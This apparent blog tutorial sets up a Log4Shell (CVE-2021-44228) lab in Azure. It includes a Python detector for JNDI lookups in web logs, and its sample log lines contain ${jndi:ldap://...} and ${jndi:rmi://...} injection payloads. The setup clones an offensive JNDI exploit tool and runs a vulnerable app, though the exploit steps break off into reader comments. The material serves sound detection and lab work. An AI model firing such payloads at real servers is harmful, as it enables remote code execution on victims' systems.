The following post walks through creating a short Log4j lab that simulates the recent Log4j vulnerability in your Azure environment – Log4j LAB & Sentinel Detection. Remember to set up this lab in a dedicated environment to test your security controls, never inside the production environment.
Log4J Overview
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2 was identified as being exploited in the wild. PoC code was released, and subsequent investigation revealed that exploitation was effortless to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker can instruct that system to download and subsequently execute a malicious payload.
As with many high-severity RCE exploits, massive scanning activity for CVE-2021-44228 has already begun on the internet with the intent of seeking out and exploiting unpatched systems. Because the exploit was discovered so recently, many servers, both on-premises and in cloud environments, have yet to be patched. We highly recommend that organizations upgrade to the latest version (2.15.0-rc2) of Apache log4j 2 on all systems.

Image credit: GovCERT
CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 — the highest possible severity rating.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints,” the description reads. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
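The detection side of this lab comes down to spotting the lookup string described above in whatever the application logged: a request that carries a ${jndi:...} lookup in its URI, User-Agent or Referer is the telltale of CVE-2021-44228 probing. The following scanner is an added example, not code from the original post or from the lab tooling; it runs over a few constructed Apache combined-format access log lines, flags each JNDI lookup, and extracts the JNDI scheme and the callback host so the hit can be triaged or forwarded to a SIEM such as Microsoft Sentinel. The log lines, IP addresses (TEST-NET ranges) and field names are assumptions made for the example.

```python
"""Flag Log4Shell-style JNDI lookups in HTTP access log lines (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# "${jndi:<scheme>:...}" matched case-insensitively. The scheme is the JNDI
# provider (ldap, ldaps, rmi, dns, iiop, ...); the target is the host[:port]
# that follows "//", up to the next "/", "}" or whitespace.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*(?://)?(?P<target>[^/}\s]*)",
    re.IGNORECASE,
)

# Apache/nginx combined log format:
# ip - - [timestamp] "METHOD path HTTP/x" status size "referer" "user-agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


@dataclass
class Finding:
    line_no: int
    client_ip: str
    scheme: str   # jndi provider, lower-cased (ldap, rmi, dns, ...)
    target: str   # host[:port] the vulnerable server would call back to
    field: str    # request field in which the lookup appeared


def scan_line(line_no: int, line: str) -> Optional[Finding]:
    """Return a Finding if any logged request field contains a JNDI lookup."""
    m = ACCESS_RE.match(line)
    if not m:
        return None  # not a combined-format line; a real pipeline would count these
    for field in ("request", "referer", "ua"):
        hit = JNDI_RE.search(m.group(field))
        if hit:
            return Finding(line_no, m.group("ip"), hit.group("scheme").lower(),
                           hit.group("target"), field)
    return None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Scan every line and return the findings in log order."""
    return [f for f in (scan_line(i, ln) for i, ln in enumerate(lines, 1)) if f]


def callback_targets(findings: Iterable[Finding]) -> List[str]:
    """Distinct callback hosts, in first-seen order, for blocklisting or IoC export."""
    seen: List[str] = []
    for f in findings:
        if f.target and f.target not in seen:
            seen.append(f.target)
    return seen


# Constructed sample log: two benign requests, one lookup in the User-Agent,
# one (upper-cased) lookup in the query string.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:15 +0000] "GET /api/login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [10/Dec/2021:14:03:01 +0000] "GET /?q=${JNDI:RMI://203.0.113.8:1099/x} HTTP/1.1" 404 12 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:14:03:30 +0000] "GET /static/app.js HTTP/1.1" 200 2048 "https://site.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h.line_no}: {h.client_ip} -> {h.scheme}://{h.target} (in {h.field})")
    print("callback targets:", callback_targets(hits))
```

The same logic transfers directly to a Sentinel analytics rule over the web server's log table: search the request, referer and user-agent columns for the lookup pattern and project the client IP and callback host. Match case-insensitively, since the lookup keyword is not case-sensitive on the vulnerable side.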
LAB Setup
To run the Log4j lab, you need the following requirements, setup steps, and commands:
Requirements
- Azure Subscription
- Kali Linux VM
- Docker installation and quick setup
- Download the JNDI-Injection-Exploit tool
LAB Setup
1. Create a Kali VM following the Kali Linux On Azure – Install Guide.
2. Install Docker with the Azure CLI (see How to run Azure CLI in a Docker Container).
3. Download and run the JNDI exploit (from this repo or any other), for example welk1n/JNDI-Injection-Exploit:
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
Then, run the vulnerable web application:
sudo docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
The Exploit
Make sure the Docker Spring Boot web application is running:
sudo docker ps
Next, open a terminal window and set up the JNDI Exploit malicious LDAP server:
Doesn’t seem that Kali is really in the Azure Marketplace anymore. I only see “Kali GUI Linux by Techlatest.net”
Like any other cloud component, this feature changed under Kali GUI Linux by Techlatest.net.
The post will be updated soon with the latest options to install Kali on Azure.
Elli.